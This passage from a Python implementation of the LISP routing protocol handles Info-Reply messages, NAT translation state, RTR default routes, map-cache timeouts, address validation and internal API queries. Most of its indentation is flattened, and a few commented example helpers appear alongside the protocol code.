info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
    #
    # This function is currently disabled; the early return suppresses the
    # test Map-Requests below.
    #
    return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
    # Check activity timers for encapsulation entries only.
#
if (mc.action == LISP_NO_ACTION):
now = lisp_get_timestamp()
if (mc.last_refresh_time + mc.map_cache_ttl > now):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
    # Now remove from lisp_map_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
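#
# Illustrative sketch of the walk-callback convention used above: walk_cache()
# calls the callback with (entry, parms) and expects [continue-flag, parms]
# back, so per-walk state like the delete and checkpoint lists is threaded
# through every call. Hypothetical example that counts map-cache entries:
#
def example_count_entries_walk(mc, parms):
    parms[0] += 1
    return([True, parms])
#enddef
#
# Hypothetical usage:
#
#   parms = lisp_map_cache.walk_cache(example_count_entries_walk, [0])
#   count = parms[0]
#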
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} dictionary maps an Info-Request hostname to an
# array of lisp_nat_info() values. We keep all the current and previous NAT
# state associated with the hostname. This is so we can track how much
# movement is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
    # So the new state does not match the youngest entry. See if it exists
    # as an older entry. If not, we prepend the new state; otherwise, we
    # prepend the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
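#
# Illustrative sketch (hypothetical names) of the list discipline
# lisp_store_nat_info() implements above: the youngest state is always
# element 0, a refresh of the youngest entry returns False, and a re-learned
# older (address, port) pair is moved to the front rather than duplicated.
#
def example_store_nat_state(state_table, hostname, addr_and_port):
    entries = state_table.get(hostname, [])
    if (entries != [] and entries[0] == addr_and_port): return(False)
    if (addr_and_port in entries): entries.remove(addr_and_port)
    state_table[hostname] = [addr_and_port] + entries
    return(True)
#enddef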
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to, and install an
# ephemeral static route to force the Info-Request to go out a specific
# interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
        #endfor
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6,
# and MAC addresses, as well as distinguished-names, geo-prefixes, and E.164
# addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
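#
# Illustrative examples of inputs lisp_valid_address_format() accepts and
# rejects:
#
#   lisp_valid_address_format("address", "10.0.0.1")         -> True
#   lisp_valid_address_format("address", "fe80::1")          -> True
#   lisp_valid_address_format("address", "0000-1111-2222")   -> True
#   lisp_valid_address_format("address", "'my-dist-name'")   -> True
#   lisp_valid_address_format("address", "+14085551212")     -> True
#   lisp_valid_address_format("address", "10.0.0.256")       -> False
#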
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
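#
# Illustrative example (hypothetical values) of the data_structure format
# lisp_process_api() expects. An empty parameter string, like "map-cache%",
# walks and returns the entire data structure:
#
#   parms = json.dumps({"instance-id": "0", "eid-prefix": "10.0.0.1/32"})
#   lisp_process_api("lisp-itr", lisp_ipc_socket, "map-cache%" + parms)
#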
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-server or map-resolver configuration to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
    # return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-device (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
